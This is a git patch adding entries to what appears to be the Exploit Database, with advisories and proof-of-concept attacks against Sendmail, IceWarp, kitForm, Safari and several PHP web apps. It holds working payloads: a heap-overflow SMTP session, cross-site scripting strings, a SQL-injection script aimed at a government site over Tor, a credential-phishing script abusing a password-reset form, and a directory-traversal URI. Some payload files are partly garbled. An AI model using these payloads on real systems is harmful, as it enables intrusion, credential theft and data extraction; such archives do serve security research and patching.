From 620b63e883f2dd0b014c65555b8e326de4f932b8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 24 Apr 2014 04:34:17 +0000 Subject: [PATCH] Updated 04_24_2014 --- files.csv | 13 ++++- platforms/linux/dos/32995.txt | 53 ++++++++++++++++++ platforms/multiple/remote/32987.txt | 9 +++ platforms/multiple/remote/32994.xml | 34 ++++++++++++ platforms/php/webapps/32983.txt | 86 +++++++++++++++++++++++++++++ platforms/php/webapps/32985.xml | 32 +++++++++++ platforms/php/webapps/32986.py | 51 +++++++++++++++++ platforms/php/webapps/32988.txt | 12 ++++ platforms/php/webapps/32989.txt | 11 ++++ platforms/php/webapps/32991.txt | 9 +++ platforms/php/webapps/32992.txt | 9 +++ platforms/php/webapps/32993.txt | 15 +++++ 12 files changed, 333 insertions(+), 1 deletion(-) create mode 100755 platforms/linux/dos/32995.txt create mode 100755 platforms/multiple/remote/32987.txt create mode 100755 platforms/multiple/remote/32994.xml create mode 100755 platforms/php/webapps/32983.txt create mode 100755 platforms/php/webapps/32985.xml create mode 100755 platforms/php/webapps/32986.py create mode 100755 platforms/php/webapps/32988.txt create mode 100755 platforms/php/webapps/32989.txt create mode 100755 platforms/php/webapps/32991.txt create mode 100755 platforms/php/webapps/32992.txt create mode 100755 platforms/php/webapps/32993.txt diff --git a/files.csv b/files.csv index 26462fcdf..b24823cb2 100755 --- a/files.csv +++ b/files.csv @@ -29722,9 +29722,20 @@ id,file,description,date,author,platform,type,port 32973,platforms/hardware/webapps/32973.txt,"Sixnet Sixview 2.4.1 - Web Console Directory Traversal",2014-04-22,"daniel svartman",hardware,webapps,0 32974,platforms/multiple/remote/32974.txt,"Glassfish Enterprise Server 2.1 Admin Console /configuration/configuration.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 32975,platforms/multiple/remote/32975.txt,"Glassfish Enterprise Server 2.1 Admin Console /customMBeans/customMBeans.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 -32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / RCE Exploit via Static Encryption Key",2014-04-22,"Mehmet Dursun Ince",php,webapps,0 +32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / RCE Exploit via Static Encryption Key",2014-04-22,"Mehmet Ince",php,webapps,0 32977,platforms/multiple/remote/32977.txt,"Glassfish Enterprise Server 2.1 Admin Console /resourceNode/resources.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 32978,platforms/multiple/remote/32978.txt,"Glassfish Enterprise Server 2.1 Admin Console /sysnet/registration.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 32979,platforms/multiple/remote/32979.txt,"Glassfish Enterprise Server 2.1 Admin Console /webService/webServicesGeneral.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 32980,platforms/multiple/remote/32980.txt,"Glassfish Enterprise Server 2.1 Admin Console /configuration/auditModuleEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0 32981,platforms/multiple/remote/32981.txt,"Glassfish Enterprise Server 2.1 Admin Console /resourceNode/jdbcResourceEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0 +32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 (sorter.php, sorter_value param) - SQL Injection",2014-04-22,chapp,php,webapps,80 +32985,platforms/php/webapps/32985.xml,"IceWarp Merak Mail Server 9.4.1 'item.php' Cross-Site Scripting Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 +32986,platforms/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 'Forgot Password' Input Validation Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 +32987,platforms/multiple/remote/32987.txt,"Woodstock 4.2 404 Error Page Cross Site Scripting Vulnerability",2009-05-05,DSecRG,multiple,remote,0 +32988,platforms/php/webapps/32988.txt,"VerliAdmin 0.3 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-05-05,TEAMELITE,php,webapps,0 +32989,platforms/php/webapps/32989.txt,"Verlihub Control Panel 1.7 Multiple Cross-Site Scripting Vulnerabilities",2009-05-06,TEAMELITE,php,webapps,0 +32991,platforms/php/webapps/32991.txt,"Claroline 1.8.11 'claroline/linker/notfound.php' Cross-Site Scripting Vulnerability",2009-05-08,"Gerendi Sandor Attila",php,webapps,0 +32992,platforms/php/webapps/32992.txt,"MagpieRSS 0.72 Cross Site Scripting And HTML Injection Vulnerabilities",2009-05-08,"Justin Klein Keane",php,webapps,0 +32993,platforms/php/webapps/32993.txt,"Dacio's Image Gallery 1.6 Multiple Remote Vulnerabilities",2009-05-11,ahmadbady,php,webapps,0 +32994,platforms/multiple/remote/32994.xml,"Apple Safari <= 3.2.2 'feed:' URI Multiple Input Validation Vulnerabilities",2009-05-12,"Billy Rios",multiple,remote,0 +32995,platforms/linux/dos/32995.txt,"Sendmail 8.12.x 'X-header' Remote Heap Buffer Overflow Vulnerability",2009-05-27,"Simple Nomad",linux,dos,0 diff --git a/platforms/linux/dos/32995.txt b/platforms/linux/dos/32995.txt new file mode 100755 index 000000000..4d7b0940c --- /dev/null +++ b/platforms/linux/dos/32995.txt @@ -0,0 +1,53 @@ +source: http://www.securityfocus.com/bid/34944/info + +Sendmail is prone to a heap-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer. + +Successfully exploiting this issue may allow an attacker to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely crash the application. + +Versions prior to Sendmail 8.13.2 are vulnerable. + +$ telnet example.com 25 +Trying ... +Connected to example.com. +Escape character is '^]'. +220 example.com ESMTP Sendmail 8.12.10/8.12.10; Fri, 3 Dec 2004 12:00:59 -06 +00 +mail from:example@example.org +250 2.1.0 example@example.org... Sender ok +rcpt to:example@example.com +250 2.1.5 example@example.com... Recipient ok +data +354 Enter mail, end with "." on a line by itself +X-Testing: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB +BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCC +CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDD +DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD +DDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE +EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF +FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGG +GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG +HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH +HHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII +IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ +JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB +BBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC +CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD +DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEE +EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE +EEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF +FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG +GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHH +HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIII +IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII +IIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ +JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ123456AAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBB +BBX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* + + +. + +250 2.0.0 iB3I0xxp005530 Message accepted for delivery + diff --git a/platforms/multiple/remote/32987.txt b/platforms/multiple/remote/32987.txt new file mode 100755 index 000000000..2f26ab29f --- /dev/null +++ b/platforms/multiple/remote/32987.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/34829/info + +Woodstock is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials. + +Woodstock 4.2 is vulnerable; other versions may also be affected. + +http://www.example.com/theme/META-INF/>+ACJ-+AD4APB-SCRIPT+AD7-alert(+ACI-DSecRG_XSS+ACI-)+ADz-/SCRIPT+AD7- diff --git a/platforms/multiple/remote/32994.xml b/platforms/multiple/remote/32994.xml new file mode 100755 index 000000000..ce4dcfd35 --- /dev/null +++ b/platforms/multiple/remote/32994.xml @@ -0,0 +1,34 @@ +source: http://www.securityfocus.com/bid/34925/info + +Apple Safari is prone to multiple input-validation vulnerabilities. + +An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious website. + +Successfully exploiting these issues will allow the attacker to execute arbitrary JavaScript code in the local security zone. This may allow the attacker to obtain sensitive information that can aid in further attacks; other consequences may also occur. + +These issues affect versions prior to Safari 3.2.3. + +On the Cylon baseship, Cavil confronts the last member of the Final Five. + + \ No newline at end of file diff --git a/platforms/php/webapps/32983.txt b/platforms/php/webapps/32983.txt new file mode 100755 index 000000000..fa94ff009 --- /dev/null +++ b/platforms/php/webapps/32983.txt @@ -0,0 +1,86 @@ +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA1 + +Happy easter.. + +* Product: phpManufaktur / kitForm +* Version: <= 0.43 (2013-11-22) +* Date: 2014-04-20 +* Criticality: Medium +* Exploitable from: Remote +* Impact: SQL Injection +* Product URL: https://github.com/phpManufaktur/kitForm + +1. Vendor Description: + +kitForm is an extension for the Customer Relationship Management (CRM) +KeepInTouch and the Content Management Systems WebsiteBaker or LEPTON +CMS. It enables the easy creation of forms and dialogs for the CMS and +the CRM. + +2. Vulnerability + +A SQL injection error within the sorter.php file can be exploited by +unauthenticated people to conduct SQL injection attacks. The file does +not sanitize the "sorter_value" parameter before using the value in a +SQL query. + +A successful exploit can extract database content and e.g. +administrative credentials (password hash). + +22. $sorter_table = $_POST['sorter_table']; +23. switch ($sorter_table): +24. case 'mod_kit_form': +25. // Frageboegen sortieren +26. $rowIDs = implode(',', $_POST['rowID']); +27. $sorter_value = $_POST['sorter_value']; +28. $SQL = sprintf( "UPDATE %smod_kit_form_table_sort + SET sort_order='%s' WHERE sort_table='%s' + AND sort_value='%s'", +29. TABLE_PREFIX, $rowIDs, $sorter_table, $sorter_value); +30. $database->query($SQL); + +3. Exploit + + 1. import httplib2, socks, urllib + 2. + 3. ### Change these values ### + 4. target = "http://fbi.gov" + 5. SQLi = "or 1=1 #" + 6. tor_http_proxy = 8118 + 7. + 8. httplib2.debuglevel=4 + 9. +10. headers = { +11. 'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; + zh-CN; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4', +12. 'Content-Type': 'application/x-www-form-urlencoded' +13. } +14. h = httplib2.Http(proxy_info = httplib2.ProxyInfo( + socks.PROXY_TYPE_HTTP, '127.0.0.1', tor_http_proxy, timeout=30) +15. +16. data = dict( +17. rowID = "1", +18. sorter_table = "mod_kit_form", +19. sorter_value = "AAAA' %s" % SQLi # <-- injection +20. ) +21. +22. resp, content = h.request( + "%s" % target, "POST", urllib.urlencode(data), headers=headers) +23 +24 print resp +25 print content + +xoxo chapp +-----BEGIN PGP SIGNATURE----- +Version: GnuPG v1.4.11 (GNU/Linux) +Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ + +iQEcBAEBAgAGBQJTU9cEAAoJECKwmdefSHejw94H/384qa0OpLaF93UNisobw0rl +pp7Y6xKvfZn2mtYHxCCMzRmV2FngJHYP1L3pMTfB0VesLB49QBrzp5TOVDkvcoBx +q4D9VOXLxWteedH3S73+plvhKtbQZHAQ74PwY31F2idrzFO10oE4kw6UDDCdpxfq +Z6JVaJQAym3rDuRD20SAjp0opfP0BmijfNmuothfC9DzEQtzU44vWrac3ZSda+lL +VKVFr5NvRQ032G0CHvx+WT8yoFPnFxybwYFbW3Exr7QedjrM8eIpf47xgrzytM7i +sMWpBl/ZqdBkh1LrIin3lKuQgMIeHs+2Rb6Rbep72RKqVxfJy6AXPqhN0804GsU= +=AylG +-----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/php/webapps/32985.xml b/platforms/php/webapps/32985.xml new file mode 100755 index 000000000..573fa63a3 --- /dev/null +++ b/platforms/php/webapps/32985.xml @@ -0,0 +1,32 @@ +source: http://www.securityfocus.com/bid/34825/info + +IceWarp Merak Mail Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal potentially sensitive information and launch other attacks. + + + + + RedTeam Pentesting + + http://www.example.come + Seeing your network from the attacker's perspective + Mon, 16 Apr 2009 05:23:42 +0000 + de + + <script>alert('Title: Your session id is: ' + +window.top.sSID);</script> + http://www.example.come/pentest + Mon, 16 Apr 2009 05:23:42 +0000 + + <div o<xml>nmouseover="alert('Description: Your session id is: ' + +window.top.sSID)"> + RedTeam Pentesting XSS + </div> + + + + diff --git a/platforms/php/webapps/32986.py b/platforms/php/webapps/32986.py new file mode 100755 index 000000000..37109c981 --- /dev/null +++ b/platforms/php/webapps/32986.py @@ -0,0 +1,51 @@ +source: http://www.securityfocus.com/bid/34827/info + +IceWarp Merak Mail Server is prone to an input-validation vulnerability because it uses client-supplied data when performing a 'Forgot Password' function. + +Attackers can exploit this issue via social-engineering techniques to obtain valid users' login credentials; other attacks may also be possible. + +#! /usr/bin/env python +import urllib2, sys + +conf = { + "captcha_uid": "5989688782215156001239966846169", + "captcha": "4SJZ Z4GY", + "forgot": "user@example.com", + "replyto": "attacker@example.com", + "server": "http://www.example.com/webmail/server/webmail.php" +} + +data = """ + + + %(forgot)s + %(captcha)s + + + + + Dear %FULLNAME%, + + your account + + Username: %USERNAME% + Password: %PASSWORD% + + has expired. To renew the account, please reply to this email + leaving the email body intact, so we know the account is still + used. + + Kind regards, + + the IT department + + + +""" % conf + +req = urllib2.Request(conf['server']) +req.add_data(data) +res = urllib2.urlopen(req) +print repr(res.read()) diff --git a/platforms/php/webapps/32988.txt b/platforms/php/webapps/32988.txt new file mode 100755 index 000000000..2b0997fa9 --- /dev/null +++ b/platforms/php/webapps/32988.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/34845/info + +VerliAdmin is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +The issues affect VerliAdmin 0.3.7 and 0.3.8; other versions may also be affected. + +http//www.example.com/index.php?q=bantest&nick="> +http//www.example.com/index.php?nick="'/> +http//www.example.com/index.php?q="'/> +http//www.example.com/index.php?"'/> \ No newline at end of file diff --git a/platforms/php/webapps/32989.txt b/platforms/php/webapps/32989.txt new file mode 100755 index 000000000..e6f74bf1e --- /dev/null +++ b/platforms/php/webapps/32989.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/34856/info + +Verlihub Control Panel is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +The issues affect Verlihub Control Panel 1.7e; other versions may also be affected. + +http://www.example.com/index.php?page=login&nick="> +http://www.example.com/index.php?page=login&nick="> \ No newline at end of file diff --git a/platforms/php/webapps/32991.txt b/platforms/php/webapps/32991.txt new file mode 100755 index 000000000..fb2c2f0cb --- /dev/null +++ b/platforms/php/webapps/32991.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/34883/info + +Claroline is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Claroline 1.8.11 is vulnerable; other versions may also be affected. + +http://www.example.com/referer/?"> Justin.MadIrish.net <script>alert('xss title');</script>- Justin's Personal Homepage http://www.example.com Close personal friends with Evil Eve. en Disturbing<script>alert('xss title');</script> XSS<script>alert('xss title');</script> http://www.example.com/node/343 foobar Wed, 04 Mar 2009 13:42:09 +0000 justin 343 at http://www.example.com \ No newline at end of file diff --git a/platforms/php/webapps/32993.txt b/platforms/php/webapps/32993.txt new file mode 100755 index 000000000..dc5883be0 --- /dev/null +++ b/platforms/php/webapps/32993.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/34906/info + +Dacio's Image Gallery is prone to multiple remote vulnerabilities: + +- An arbitrary-file-upload vulnerability +- An authentication-bypass vulnerability +- A directory-traversal vulnerability + +An attacker can exploit these issues to upload and execute arbitrary script code on an affected computer with the privileges of the webserver process, view arbitrary local files, or gain unauthorized access to the affected application. + +Dacio's Image Gallery 1.6 is vulnerable; other versions may also be affected. + +The following example URI for the directory-traversal vulnerability is available: + +http://www.example.com/Dacio_imgGal-v1.6/index.php?gallery=../config.inc%00 \ No newline at end of file